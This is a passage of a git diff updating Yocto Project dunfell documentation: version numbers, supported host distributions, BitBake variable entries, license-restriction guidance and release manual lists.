684 (e.g. &DISTRO_NAME_NO_CAP;, &DISTRO_NAME_NO_CAP_MINUS_ONE;, and so forth). 684 releases are visible. The "Download" links in the rows of the table there
685 will lead to the download tarballs for the release.
685 686
686 .. note:: 687 .. note::
687 688
@@ -691,9 +692,9 @@ Releases <#accessing-index-of-releases>`__" section.
691 You can use the "RELEASE ARCHIVE" link to reveal a menu of all Yocto 692 You can use the "RELEASE ARCHIVE" link to reveal a menu of all Yocto
692 Project releases. 693 Project releases.
693 694
6944. *Download Tools or Board Support Packages (BSPs):* From the 695#. *Download Tools or Board Support Packages (BSPs):* Next to the tarballs you
695 "DOWNLOADS" page, you can download tools or BSPs as well. Just scroll 696 will find download tools or BSPs as well. Just select a Yocto Project
696 down the page and look for what you need. 697 release and look for what you need.
697 698
698Accessing Nightly Builds 699Accessing Nightly Builds
699------------------------ 700------------------------
diff --git a/documentation/kernel-dev/kernel-dev-common.rst b/documentation/kernel-dev/kernel-dev-common.rst
index 830b3e88ca..6b5e9484d0 100644
--- a/documentation/kernel-dev/kernel-dev-common.rst
+++ b/documentation/kernel-dev/kernel-dev-common.rst
@@ -1100,7 +1100,7 @@ Section.
1100 :: 1100 ::
1101 1101
1102 FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:" 1102 FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
1103 SRC_URI_append = "file://0001-calibrate.c-Added-some-printk-statements.patch" 1103 SRC_URI_append = " file://0001-calibrate.c-Added-some-printk-statements.patch"
1104 1104
1105 The :term:`FILESEXTRAPATHS` and :term:`SRC_URI` statements 1105 The :term:`FILESEXTRAPATHS` and :term:`SRC_URI` statements
1106 enable the OpenEmbedded build system to find the patch file. 1106 enable the OpenEmbedded build system to find the patch file.
diff --git a/documentation/overview-manual/overview-manual-concepts.rst b/documentation/overview-manual/overview-manual-concepts.rst
index d9f50e5194..3401f534b1 100644
--- a/documentation/overview-manual/overview-manual-concepts.rst
+++ b/documentation/overview-manual/overview-manual-concepts.rst
@@ -1986,9 +1986,7 @@ Behind the scenes, the shared state code works by looking in
1986shared state files. Here is an example: 1986shared state files. Here is an example:
1987:: 1987::
1988 1988
1989 SSTATE_MIRRORS ?= "\ 1989 SSTATE_MIRRORS ?= "file://.* https://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
1990 file://.\* http://someserver.tld/share/sstate/PATH;downloadfilename=PATH \n \
1991 file://.\* file:///some/local/dir/sstate/PATH"
1992 1990
1993.. note:: 1991.. note::
1994 1992
diff --git a/documentation/overview-manual/overview-manual-development-environment.rst b/documentation/overview-manual/overview-manual-development-environment.rst
index 4bedd6df67..a5469d4d78 100644
--- a/documentation/overview-manual/overview-manual-development-environment.rst
+++ b/documentation/overview-manual/overview-manual-development-environment.rst
@@ -422,7 +422,7 @@ files. Git uses "branches" to organize different development efforts.
422For example, the ``poky`` repository has several branches that include 422For example, the ``poky`` repository has several branches that include
423the current "&DISTRO_NAME_NO_CAP;" branch, the "master" branch, and many 423the current "&DISTRO_NAME_NO_CAP;" branch, the "master" branch, and many
424branches for past Yocto Project releases. You can see all the branches 424branches for past Yocto Project releases. You can see all the branches
425by going to https://git.yoctoproject.org/cgit.cgi/poky/ and clicking on the 425by going to :yocto_git:`/cgit.cgi/poky/` and clicking on the
426``[...]`` link beneath the "Branch" heading. 426``[...]`` link beneath the "Branch" heading.
427 427
428Each of these branches represents a specific area of development. The 428Each of these branches represents a specific area of development. The
@@ -468,7 +468,7 @@ Git uses "tags" to mark specific changes in a repository branch
468structure. Typically, a tag is used to mark a special point such as the 468structure. Typically, a tag is used to mark a special point such as the
469final change (or commit) before a project is released. You can see the 469final change (or commit) before a project is released. You can see the
470tags used with the ``poky`` Git repository by going to 470tags used with the ``poky`` Git repository by going to
471https://git.yoctoproject.org/cgit.cgi/poky/ and clicking on the ``[...]`` link 471:yocto_git:`/cgit.cgi/poky/` and clicking on the ``[...]`` link
472beneath the "Tag" heading. 472beneath the "Tag" heading.
473 473
474Some key tags for the ``poky`` repository are ``jethro-14.0.3``, 474Some key tags for the ``poky`` repository are ``jethro-14.0.3``,
diff --git a/documentation/overview-manual/overview-manual-yp-intro.rst b/documentation/overview-manual/overview-manual-yp-intro.rst
index f1c725ac27..2675074f14 100644
--- a/documentation/overview-manual/overview-manual-yp-intro.rst
+++ b/documentation/overview-manual/overview-manual-yp-intro.rst
@@ -271,8 +271,8 @@ with the string ``meta-``.
271 , but it is a commonly accepted standard in the Yocto Project 271 , but it is a commonly accepted standard in the Yocto Project
272 community. 272 community.
273 273
274For example, if you were to examine the `tree 274For example, if you were to examine the :yocto_git:`tree
275view <https://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/>`__ of the 275view </cgit/cgit.cgi/poky/tree/>` of the
276``poky`` repository, you will see several layers: ``meta``, 276``poky`` repository, you will see several layers: ``meta``,
277``meta-skeleton``, ``meta-selftest``, ``meta-poky``, and 277``meta-skeleton``, ``meta-selftest``, ``meta-poky``, and
278``meta-yocto-bsp``. Each of these repositories represents a distinct 278``meta-yocto-bsp``. Each of these repositories represents a distinct
@@ -377,7 +377,7 @@ activities using the Yocto Project:
377 Index <http://layers.openembedded.org/layerindex/layers/>`__, which 377 Index <http://layers.openembedded.org/layerindex/layers/>`__, which
378 is a website that indexes OpenEmbedded-Core layers. 378 is a website that indexes OpenEmbedded-Core layers.
379 379
380- *Patchwork:* `Patchwork <http://jk.ozlabs.org/projects/patchwork/>`__ 380- *Patchwork:* `Patchwork <https://patchwork.yoctoproject.org/>`__
381 is a fork of a project originally started by 381 is a fork of a project originally started by
382 `OzLabs <http://ozlabs.org/>`__. The project is a web-based tracking 382 `OzLabs <http://ozlabs.org/>`__. The project is a web-based tracking
383 system designed to streamline the process of bringing contributions 383 system designed to streamline the process of bringing contributions
diff --git a/documentation/poky.yaml b/documentation/poky.yaml
index ee9b2acbeb..0ab046428b 100644
--- a/documentation/poky.yaml
+++ b/documentation/poky.yaml
@@ -1,11 +1,13 @@
1DISTRO : "3.1.6" 1DISTRO : "3.1.33"
2DISTRO_NAME_NO_CAP : "dunfell" 2DISTRO_NAME_NO_CAP : "dunfell"
3DISTRO_NAME : "Dunfell" 3DISTRO_NAME : "Dunfell"
4DISTRO_NAME_NO_CAP_MINUS_ONE : "zeus" 4DISTRO_NAME_NO_CAP_MINUS_ONE : "zeus"
5YOCTO_DOC_VERSION : "3.1.6" 5YOCTO_DOC_VERSION : "3.1.33"
6YOCTO_DOC_VERSION_MINUS_ONE : "3.0.2" 6YOCTO_DOC_VERSION_MINUS_ONE : "3.0.4"
7DISTRO_REL_TAG : "yocto-3.1.6" 7DISTRO_REL_TAG : "yocto-3.1.33"
8POKYVERSION : "23.0.6" 8DOCCONF_VERSION : "3.1.33"
9BITBAKE_SERIES : "1.46"
10POKYVERSION : "23.0.33"
9YOCTO_POKY : "poky-&DISTRO_NAME_NO_CAP;-&POKYVERSION;" 11YOCTO_POKY : "poky-&DISTRO_NAME_NO_CAP;-&POKYVERSION;"
10YOCTO_DL_URL : "https://downloads.yoctoproject.org" 12YOCTO_DL_URL : "https://downloads.yoctoproject.org"
11YOCTO_AB_URL : "https://autobuilder.yoctoproject.org" 13YOCTO_AB_URL : "https://autobuilder.yoctoproject.org"
@@ -18,7 +20,8 @@ FEDORA_HOST_PACKAGES_ESSENTIAL : "gawk make wget tar bzip2 gzip python3 unzip pe
18 diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \ 20 diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \
19 ccache perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue perl-bignum socat \ 21 ccache perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue perl-bignum socat \
20 python3-pexpect findutils which file cpio python python3-pip xz python3-GitPython \ 22 python3-pexpect findutils which file cpio python python3-pip xz python3-GitPython \
21 python3-jinja2 SDL-devel xterm rpcgen mesa-libGL-devel" 23 python3-jinja2 SDL-devel xterm rpcgen mesa-libGL-devel perl-FindBin perl-File-Compare \
24 perl-File-Copy perl-locale"
22OPENSUSE_HOST_PACKAGES_ESSENTIAL : "python gcc gcc-c++ git chrpath make wget python-xml \ 25OPENSUSE_HOST_PACKAGES_ESSENTIAL : "python gcc gcc-c++ git chrpath make wget python-xml \
23 diffstat makeinfo python-curses patch socat python3 python3-curses tar python3-pip \ 26 diffstat makeinfo python-curses patch socat python3 python3-curses tar python3-pip \
24 python3-pexpect xz which python3-Jinja2 Mesa-libEGL1 libSDL-devel xterm rpcgen Mesa-dri-devel 27 python3-pexpect xz which python3-Jinja2 Mesa-libEGL1 libSDL-devel xterm rpcgen Mesa-dri-devel
diff --git a/documentation/profile-manual/profile-manual-usage.rst b/documentation/profile-manual/profile-manual-usage.rst
index d3c020a1cf..e389a13fc0 100644
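--- a/documentation/profile-manual/profile-manual-usage.rst
+++ b/documentation/profile-manual/profile-manual-usage.rst
@@ -1169,9 +1169,8 @@ e.g. 'perf help' or 'perf help record'.
 
 However, by default Yocto doesn't install man pages, but perf invokes
 the man pages for most help functionality. This is a bug and is being
-addressed by a Yocto bug: `Bug 3388 - perf: enable man pages for basic
-'help'
-functionality <https://bugzilla.yoctoproject.org/show_bug.cgi?id=3388>`__.
+addressed by a Yocto bug: :yocto_bugs:`Bug 3388 - perf: enable man pages for basic
+'help' functionality </show_bug.cgi?id=3388>`.
 
 The man pages in text form, along with some other files, such as a set
 of examples, can be found in the 'perf' directory of the kernel tree: ::
@@ -1735,7 +1734,7 @@ events':
 
 The tool is pretty self-explanatory, but for more detailed information
 on navigating through the data, see the `kernelshark
-website <http://rostedt.homelinux.com/kernelshark/>`__.
+website <https://kernelshark.org/Documentation.html>`__.
 
 .. _ftrace-documentation:
 
@@ -1766,8 +1765,8 @@ There is a nice series of articles on using ftrace and trace-cmd at LWN:
 - `trace-cmd: A front-end for
  Ftrace <https://lwn.net/Articles/410200/>`__
 
-There's more detailed documentation kernelshark usage here:
-`KernelShark <http://rostedt.homelinux.com/kernelshark/>`__
+See also `KernelShark's documentation <https://kernelshark.org/Documentation.html>`__
+for further usage details.
 
 An amusing yet useful README (a tracing mini-HOWTO) can be found in
 ``/sys/kernel/debug/tracing/README``.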
diff --git a/documentation/ref-manual/migration-3.0.rst b/documentation/ref-manual/migration-3.0.rst
index 047b75526f..50f7d697b0 100644
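--- a/documentation/ref-manual/migration-3.0.rst
+++ b/documentation/ref-manual/migration-3.0.rst
@@ -184,8 +184,7 @@ The following BitBake changes have occurred.
  exceptions. Remove this argument in any calls to
  ``bb.build.exec_func()`` in custom classes or scripts.
 
-- The
- :term:`bitbake:BB_SETSCENE_VERIFY_FUNCTION2`
+- The ``BB_SETSCENE_VERIFY_FUNCTION2`` variable
  is no longer used. In the unlikely event that you have any references
  to it, they should be removed.
 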
diff --git a/documentation/ref-manual/ref-classes.rst b/documentation/ref-manual/ref-classes.rst
index e657fe0e55..dea27eea88 100644
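--- a/documentation/ref-manual/ref-classes.rst
+++ b/documentation/ref-manual/ref-classes.rst
@@ -1315,16 +1315,6 @@ The following list shows the tests you can list with the ``WARN_QA`` and
  automatically get these versions. Consequently, you should only need
  to explicitly add dependencies to binary driver recipes.
 
-.. _ref-classes-insserv:
-
-``insserv.bbclass``
-===================
-
-The ``insserv`` class uses the ``insserv`` utility to update the order
-of symbolic links in ``/etc/rc?.d/`` within an image based on
-dependencies specified by LSB headers in the ``init.d`` scripts
-themselves.
-
 .. _ref-classes-kernel:
 
 ``kernel.bbclass``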
diff --git a/documentation/ref-manual/ref-features.rst b/documentation/ref-manual/ref-features.rst
index f28ad2bb4c..be3a9e3a3e 100644
--- a/documentation/ref-manual/ref-features.rst
+++ b/documentation/ref-manual/ref-features.rst
@@ -63,6 +63,8 @@ Project metadata:
63 63
64- *keyboard:* Hardware has a keyboard 64- *keyboard:* Hardware has a keyboard
65 65
66- *numa:* Hardware has non-uniform memory access
67
66- *pcbios:* Support for booting through BIOS 68- *pcbios:* Support for booting through BIOS
67 69
68- *pci:* Hardware has a PCI bus 70- *pci:* Hardware has a PCI bus
diff --git a/documentation/ref-manual/ref-images.rst b/documentation/ref-manual/ref-images.rst
index 56ec8562f8..70feadf1ff 100644
--- a/documentation/ref-manual/ref-images.rst
+++ b/documentation/ref-manual/ref-images.rst
@@ -14,16 +14,17 @@ image you want.
14 Building an image without GNU General Public License Version 3 14 Building an image without GNU General Public License Version 3
15 (GPLv3), GNU Lesser General Public License Version 3 (LGPLv3), and 15 (GPLv3), GNU Lesser General Public License Version 3 (LGPLv3), and
16 the GNU Affero General Public License Version 3 (AGPL-3.0) components 16 the GNU Affero General Public License Version 3 (AGPL-3.0) components
17 is only supported for minimal and base images. Furthermore, if you 17 is only tested for core-image-minimal image. Furthermore, if you would like to
18 are going to build an image using non-GPLv3 and similarly licensed 18 build an image and verify that it does not include GPLv3 and similarly licensed
19 components, you must make the following changes in the ``local.conf`` 19 components, you must make the following changes in the image recipe
20 file before using the BitBake command to build the minimal or base 20 file before using the BitBake command to build the image:
21 image:
22 ::
23 21
24 1. Comment out the EXTRA_IMAGE_FEATURES line 22 INCOMPATIBLE_LICENSE = "GPL-3.0* LGPL-3.0*"
25 2. Set INCOMPATIBLE_LICENSE = "GPL-3.0 LGPL-3.0 AGPL-3.0"
26 23
24 Alternatively, you can adjust ``local.conf`` file, repeating and adjusting the line
25 for all images where the license restriction must apply:
26
27 INCOMPATIBLE_LICENSE_pn-your-image-name = "GPL-3.0* LGPL-3.0*"
27 28
28From within the ``poky`` Git repository, you can use the following 29From within the ``poky`` Git repository, you can use the following
29command to display the list of directories within the :term:`Source Directory` 30command to display the list of directories within the :term:`Source Directory`
diff --git a/documentation/ref-manual/ref-release-process.rst b/documentation/ref-manual/ref-release-process.rst
index a6d9ff60ec..8dcbea7beb 100644
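--- a/documentation/ref-manual/ref-release-process.rst
+++ b/documentation/ref-manual/ref-release-process.rst
@@ -138,7 +138,7 @@ consists of the following pieces:
  piece of software. The test allows the packages to be be run within a
  target image.
 
-- ``oe-selftest``: Tests combination BitBake invocations. These tests
+- ``oe-selftest``: Tests combinations of BitBake invocations. These tests
  operate outside the OpenEmbedded build system itself. The
  ``oe-selftest`` can run all tests by default or can run selected
  tests or test suites.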
diff --git a/documentation/ref-manual/ref-system-requirements.rst b/documentation/ref-manual/ref-system-requirements.rst
index 65234d0722..efb60e1009 100644
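--- a/documentation/ref-manual/ref-system-requirements.rst
+++ b/documentation/ref-manual/ref-system-requirements.rst
@@ -34,16 +34,30 @@ and conceptual information in the :doc:`../overview-manual/overview-manual`.
 Supported Linux Distributions
 =============================
 
-Currently, the Yocto Project is supported on the following
-distributions:
+Currently, the &DISTRO; release ("&DISTRO_NAME;") of the Yocto Project is
+supported on the following distributions:
 
-- Ubuntu 16.04 (LTS)
+- Ubuntu 20.04 (LTS)
+
+- Ubuntu 22.04 (LTS)
+
+- Fedora 38
+
+- Debian GNU/Linux 11.x (Bullseye)
+
+- AlmaLinux 8
+
+The following distribution versions are still tested even though the
+organizations publishing them no longer make updates publicly available:
 
 - Ubuntu 18.04 (LTS)
 
-- Ubuntu 19.04
+Finally, here are the distribution versions which were previously
+tested on former revisions of "&DISTRO_NAME;", but no longer are:
 
-- Ubuntu 20.04
+- Ubuntu 16.04 (LTS)
+
+- Ubuntu 19.04
 
 - Fedora 28
 
@@ -55,8 +69,20 @@ distributions:
 
 - Fedora 32
 
+- Fedora 33
+
+- Fedora 34
+
+- Fedora 35
+
+- Fedora 36
+
+- Fedora 37
+
 - CentOS 7.x
 
+- CentOS 8.x
+
 - Debian GNU/Linux 8.x (Jessie)
 
 - Debian GNU/Linux 9.x (Stretch)
@@ -65,6 +91,9 @@ distributions:
 
 - OpenSUSE Leap 15.1
 
+- OpenSUSE Leap 15.2
+
+- OpenSUSE Leap 15.3
 
 .. note::
 
@@ -338,7 +367,7 @@ Downloading a Pre-Built ``buildtools`` Tarball
 Downloading and running a pre-built buildtools installer is the easiest
 of the two methods by which you can get these tools:
 
-1. Locate and download the ``*.sh`` at &YOCTO_RELEASE_DL_URL;/buildtools/
+1. Locate and download the ``*.sh`` at :yocto_dl:`/releases/yocto/&DISTRO_REL_TAG;/buildtools/`
 
 2. Execute the installation script. Here is an example for the
  traditional installer: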
diff --git a/documentation/ref-manual/ref-tasks.rst b/documentation/ref-manual/ref-tasks.rst
index 4ed15365f3..2f1959a010 100644
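--- a/documentation/ref-manual/ref-tasks.rst
+++ b/documentation/ref-manual/ref-tasks.rst
@@ -331,22 +331,19 @@ file as a patch file:
  file://file;apply=yes \
  "
 
-Conversely, if you have a directory full of patch files and you want to
-exclude some so that the ``do_patch`` task does not apply them during
-the patch phase, you can use the "apply=no" parameter with the
-``SRC_URI`` statement:
-::
+Conversely, if you have a file whose file type is ``.patch`` or ``.diff``
+and you want to exclude it so that the ``do_patch`` task does not apply
+it during the patch phase, you can use the "apply=no" parameter with the
+:term:`SRC_URI` statement::
 
  SRC_URI = " \
  git://path_to_repo/some_package \
- file://path_to_lots_of_patch_files \
- file://path_to_lots_of_patch_files/patch_file5;apply=no \
+ file://file1.patch \
+ file://file2.patch;apply=no \
  "
 
-In the
-previous example, assuming all the files in the directory holding the
-patch files end with either ``.patch`` or ``.diff``, every file would be
-applied as a patch by default except for the ``patch_file5`` patch.
+In the previous example ``file1.patch`` would be applied as a patch by default
+while ``file2.patch`` would not be applied.
 
 You can find out more about the patching process in the
 ":ref:`patching-dev-environment`" section in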
diff --git a/documentation/ref-manual/ref-variables.rst b/documentation/ref-manual/ref-variables.rst
index a8375cd37c..227c81fc39 100644
--- a/documentation/ref-manual/ref-variables.rst
+++ b/documentation/ref-manual/ref-variables.rst
@@ -3337,9 +3337,18 @@ system and gives an overview of their function and contents.
3337 :term:`INCOMPATIBLE_LICENSE` 3337 :term:`INCOMPATIBLE_LICENSE`
3338 Specifies a space-separated list of license names (as they would 3338 Specifies a space-separated list of license names (as they would
3339 appear in :term:`LICENSE`) that should be excluded 3339 appear in :term:`LICENSE`) that should be excluded
3340 from the build. Recipes that provide no alternatives to listed 3340 from the build (if set globally), or from an image (if set locally
3341 in an image recipe).
3342
3343 When the variable is set globally, recipes that provide no alternatives to listed
3341 incompatible licenses are not built. Packages that are individually 3344 incompatible licenses are not built. Packages that are individually
3342 licensed with the specified incompatible licenses will be deleted. 3345 licensed with the specified incompatible licenses will be deleted.
3346 Most of the time this does not allow a feasible build (because it becomes impossible
3347 to satisfy build time dependencies), so the recommended way to
3348 implement license restrictions is to set the variable in specific
3349 image recipes where the restrictions must apply. That way there
3350 are no build time restrictions, but the license check is still
3351 performed when the image's filesystem is assembled from packages.
3343 3352
3344 .. note:: 3353 .. note::
3345 3354
@@ -3811,6 +3820,15 @@ system and gives an overview of their function and contents.
3811 3820
3812 KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}" 3821 KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
3813 3822
3823 :term:`KERNEL_DTC_FLAGS`
3824 Specifies the ``dtc`` flags that are passed to the Linux kernel build
3825 system when generating the device trees (via ``DTC_FLAGS`` environment
3826 variable).
3827
3828 In order to use this variable, the
3829 :ref:`kernel-devicetree <ref-classes-kernel-devicetree>` class must
3830 be inherited.
3831
3814 :term:`KERNEL_EXTRA_ARGS` 3832 :term:`KERNEL_EXTRA_ARGS`
3815 Specifies additional ``make`` command-line arguments the OpenEmbedded 3833 Specifies additional ``make`` command-line arguments the OpenEmbedded
3816 build system passes on when compiling the kernel. 3834 build system passes on when compiling the kernel.
@@ -3837,10 +3855,10 @@ system and gives an overview of their function and contents.
3837 :: 3855 ::
3838 3856
3839 KERNEL_EXTRA_FEATURES ?= "features/netfilter/netfilter.scc features/taskstats/taskstats.scc" 3857 KERNEL_EXTRA_FEATURES ?= "features/netfilter/netfilter.scc features/taskstats/taskstats.scc"
3840 KERNEL_FEATURES_append = "${KERNEL_EXTRA_FEATURES}" 3858 KERNEL_FEATURES_append = " ${KERNEL_EXTRA_FEATURES}"
3841 KERNEL_FEATURES_append_qemuall = "cfg/virtio.scc" 3859 KERNEL_FEATURES_append_qemuall = " cfg/virtio.scc"
3842 KERNEL_FEATURES_append_qemux86 = " cfg/sound.scc cfg/paravirt_kvm.scc" 3860 KERNEL_FEATURES_append_qemux86 = " cfg/sound.scc cfg/paravirt_kvm.scc"
3843 KERNEL_FEATURES_append_qemux86-64 = "cfg/sound.scc" 3861 KERNEL_FEATURES_append_qemux86-64 = " cfg/sound.scc"
3844 3862
3845 :term:`KERNEL_FIT_LINK_NAME` 3863 :term:`KERNEL_FIT_LINK_NAME`
3846 The link name of the kernel flattened image tree (FIT) image. This 3864 The link name of the kernel flattened image tree (FIT) image. This
@@ -4039,7 +4057,7 @@ system and gives an overview of their function and contents.
4039 SRCREV_machine_core2-32-intel-common = "43b9eced9ba8a57add36af07736344dcc383f711" 4057 SRCREV_machine_core2-32-intel-common = "43b9eced9ba8a57add36af07736344dcc383f711"
4040 KMACHINE_core2-32-intel-common = "intel-core2-32" 4058 KMACHINE_core2-32-intel-common = "intel-core2-32"
4041 KBRANCH_core2-32-intel-common = "standard/base" 4059 KBRANCH_core2-32-intel-common = "standard/base"
4042 KERNEL_FEATURES_append_core2-32-intel-common = "${KERNEL_FEATURES_INTEL_COMMON}" 4060 KERNEL_FEATURES_append_core2-32-intel-common = " ${KERNEL_FEATURES_INTEL_COMMON}"
4043 4061
4044 The ``KMACHINE`` statement says 4062 The ``KMACHINE`` statement says
4045 that the kernel understands the machine name as "intel-core2-32". 4063 that the kernel understands the machine name as "intel-core2-32".
@@ -7138,6 +7156,32 @@ system and gives an overview of their function and contents.
7138 :term:`SSTATE_DIR` 7156 :term:`SSTATE_DIR`
7139 The directory for the shared state cache. 7157 The directory for the shared state cache.
7140 7158
7159 :term:`SSTATE_EXCLUDEDEPS_SYSROOT`
7160 This variable allows to specify indirect dependencies to exclude
7161 from sysroots, for example to avoid the situations when a dependency on
7162 any ``-native`` recipe will pull in all dependencies of that recipe
7163 in the recipe sysroot. This behaviour might not always be wanted,
7164 for example when that ``-native`` recipe depends on build tools
7165 that are not relevant for the current recipe.
7166
7167 This way, irrelevant dependencies are ignored, which could have
7168 prevented the reuse of prebuilt artifacts stored in the Shared
7169 State Cache.
7170
7171 :term:`SSTATE_EXCLUDEDEPS_SYSROOT` is evaluated as two regular
7172 expressions of recipe and dependency to ignore. An example
7173 is the rule in :oe_git:`meta/conf/layer.conf </openembedded-core/tree/meta/conf/layer.conf>`::
7174
7175 # Nothing needs to depend on libc-initial
7176 # base-passwd/shadow-sysroot don't need their dependencies
7177 SSTATE_EXCLUDEDEPS_SYSROOT += "\
7178 .*->.*-initial.* \
7179 .*(base-passwd|shadow-sysroot)->.* \
7180 "
7181
7182 The ``->`` substring represents the dependency between
7183 the two regular expressions.
7184
7141 :term:`SSTATE_MIRROR_ALLOW_NETWORK` 7185 :term:`SSTATE_MIRROR_ALLOW_NETWORK`
7142 If set to "1", allows fetches from mirrors that are specified in 7186 If set to "1", allows fetches from mirrors that are specified in
7143 :term:`SSTATE_MIRRORS` to work even when 7187 :term:`SSTATE_MIRRORS` to work even when
@@ -7533,7 +7577,7 @@ system and gives an overview of their function and contents.
7533 ``SYSTEMD_BOOT_CFG`` as follows: 7577 ``SYSTEMD_BOOT_CFG`` as follows:
7534 :: 7578 ::
7535 7579
7536 SYSTEMD_BOOT_CFG ?= "${:term:`S`}/loader.conf" 7580 SYSTEMD_BOOT_CFG ?= "${S}/loader.conf"
7537 7581
7538 For information on Systemd-boot, see the `Systemd-boot 7582 For information on Systemd-boot, see the `Systemd-boot
7539 documentation <http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/>`__. 7583 documentation <http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/>`__.
@@ -8736,4 +8780,22 @@ system and gives an overview of their function and contents.
8736 8780
8737 The default value of ``XSERVER``, if not specified in the machine 8781 The default value of ``XSERVER``, if not specified in the machine
8738 configuration, is "xserver-xorg xf86-video-fbdev xf86-input-evdev". 8782 configuration, is "xserver-xorg xf86-video-fbdev xf86-input-evdev".
8739 8783
8784 :term:`XZ_THREADS`
8785 Specifies the number of parallel threads that should be used when
8786 using xz compression.
8787
8788 By default this scales with core count, but is never set less than 2
8789 to ensure that multi-threaded mode is always used so that the output
8790 file contents are deterministic. Builds will work with a value of 1
8791 but the output will differ compared to the output from the compression
8792 generated when more than one thread is used.
8793
8794 On systems where many tasks run in parallel, setting a limit to this
8795 can be helpful in controlling system resource usage.
8796
8797 :term:`XZ_MEMLIMIT`
8798 Specifies the maximum memory the xz compression should use as a percentage
8799 of system memory. If unconstrained the xz compressor can use large amounts of
8800 memory and become problematic with parallelism elsewhere in the build.
8801 "50%" has been found to be a good value.
diff --git a/documentation/releases.rst b/documentation/releases.rst
index 536c3a6d2c..affe63403c 100644
--- a/documentation/releases.rst
+++ b/documentation/releases.rst
@@ -1,32 +1,72 @@
1.. SPDX-License-Identifier: CC-BY-SA-2.0-UK 1.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
2 2
3========================= 3===========================
4 Current Release Manuals 4 Supported Release Manuals
5========================= 5===========================
6
7******************************
8Release Series 3.4 (honister)
9******************************
10
11- :yocto_docs:`3.4 Documentation </3.4>`
12- :yocto_docs:`3.4.1 Documentation </3.4.1>`
13
14******************************
15Release Series 3.3 (hardknott)
16******************************
17
18- :yocto_docs:`3.3 Documentation </3.3>`
19- :yocto_docs:`3.3.1 Documentation </3.3.1>`
20- :yocto_docs:`3.3.2 Documentation </3.3.2>`
21- :yocto_docs:`3.3.3 Documentation </3.3.3>`
22- :yocto_docs:`3.3.4 Documentation </3.3.4>`
6 23
7**************************** 24****************************
83.1 'dunfell' Release Series 25Release Series 3.1 (dunfell)
9**************************** 26****************************
10 27
11- :yocto_docs:`3.1 Documentation </3.1>` 28- :yocto_docs:`3.1 Documentation </3.1>`
12- :yocto_docs:`3.1.1 Documentation </3.1.1>` 29- :yocto_docs:`3.1.1 Documentation </3.1.1>`
13- :yocto_docs:`3.1.2 Documentation </3.1.2>` 30- :yocto_docs:`3.1.2 Documentation </3.1.2>`
31- :yocto_docs:`3.1.3 Documentation </3.1.3>`
32- :yocto_docs:`3.1.4 Documentation </3.1.4>`
33- :yocto_docs:`3.1.5 Documentation </3.1.5>`
34- :yocto_docs:`3.1.6 Documentation </3.1.6>`
35- :yocto_docs:`3.1.7 Documentation </3.1.7>`
36- :yocto_docs:`3.1.8 Documentation </3.1.8>`
37- :yocto_docs:`3.1.9 Documentation </3.1.9>`
38- :yocto_docs:`3.1.10 Documentation </3.1.10>`
39- :yocto_docs:`3.1.11 Documentation </3.1.11>`
40- :yocto_docs:`3.1.12 Documentation </3.1.12>`
41- :yocto_docs:`3.1.13 Documentation </3.1.13>`
42- :yocto_docs:`3.1.14 Documentation </3.1.14>`
14 43
15========================== 44==========================
16 Previous Release Manuals 45 Outdated Release Manuals
17========================== 46==========================
18 47
48*******************************
49Release Series 3.2 (gatesgarth)
50*******************************
51
52- :yocto_docs:`3.2 Documentation </3.2>`
53- :yocto_docs:`3.2.1 Documentation </3.2.1>`
54- :yocto_docs:`3.2.2 Documentation </3.2.2>`
55- :yocto_docs:`3.2.3 Documentation </3.2.3>`
56- :yocto_docs:`3.2.4 Documentation </3.2.4>`
57
19************************* 58*************************
203.0 'zeus' Release Series 59Release Series 3.0 (zeus)
21************************* 60*************************
22 61
23- :yocto_docs:`3.0 Documentation </3.0>` 62- :yocto_docs:`3.0 Documentation </3.0>`
24- :yocto_docs:`3.0.1 Documentation </3.0.1>` 63- :yocto_docs:`3.0.1 Documentation </3.0.1>`
25- :yocto_docs:`3.0.2 Documentation </3.0.2>` 64- :yocto_docs:`3.0.2 Documentation </3.0.2>`
26- :yocto_docs:`3.0.3 Documentation </3.0.3>` 65- :yocto_docs:`3.0.3 Documentation </3.0.3>`
66- :yocto_docs:`3.0.4 Documentation </3.0.4>`
27 67
28**************************** 68****************************
292.7 'warrior' Release Series 69Release Series 2.7 (warrior)
30**************************** 70****************************
31 71
32- :yocto_docs:`2.7 Documentation </2.7>` 72- :yocto_docs:`2.7 Documentation </2.7>`
@@ -36,7 +76,7 @@
36- :yocto_docs:`2.7.4 Documentation </2.7.4>` 76- :yocto_docs:`2.7.4 Documentation </2.7.4>`
37 77
38************************* 78*************************
392.6 'thud' Release Series 79Release Series 2.6 (thud)
40************************* 80*************************
41 81
42- :yocto_docs:`2.6 Documentation </2.6>` 82- :yocto_docs:`2.6 Documentation </2.6>`
@@ -46,16 +86,16 @@
46- :yocto_docs:`2.6.4 Documentation </2.6.4>` 86- :yocto_docs:`2.6.4 Documentation </2.6.4>`
47 87
48************************* 88*************************
492.5 'sumo' Release Series 89Release Series 2.5 (sumo)
50************************* 90*************************
51 91
52- :yocto_docs:`2.5 Documentation </2.5>` 92- :yocto_docs:`2.5 Documentation </2.5>`
53- :yocto_docs:`2.5.1 Documentation </2.5.1>` 93- :yocto_docs:`2.5.1 Documentation </2.5.1>`
54- :yocto_docs:`2.5.2 Documentation </2.5.2>` 94- :yocto_docs:`2.5.2 Documentation </2.5.2>`
55- :yocto_docs:`2.5.3 Documentation </2.5.3>` 95- :yocto_docs:`2.5.3 Documentation </2.5.3>`
56 96
57************************** 97**************************
582.4 'rocko' Release Series 98Release Series 2.4 (rocko)
59************************** 99**************************
60 100
61- :yocto_docs:`2.4 Documentation </2.4>` 101- :yocto_docs:`2.4 Documentation </2.4>`
@@ -65,7 +105,7 @@
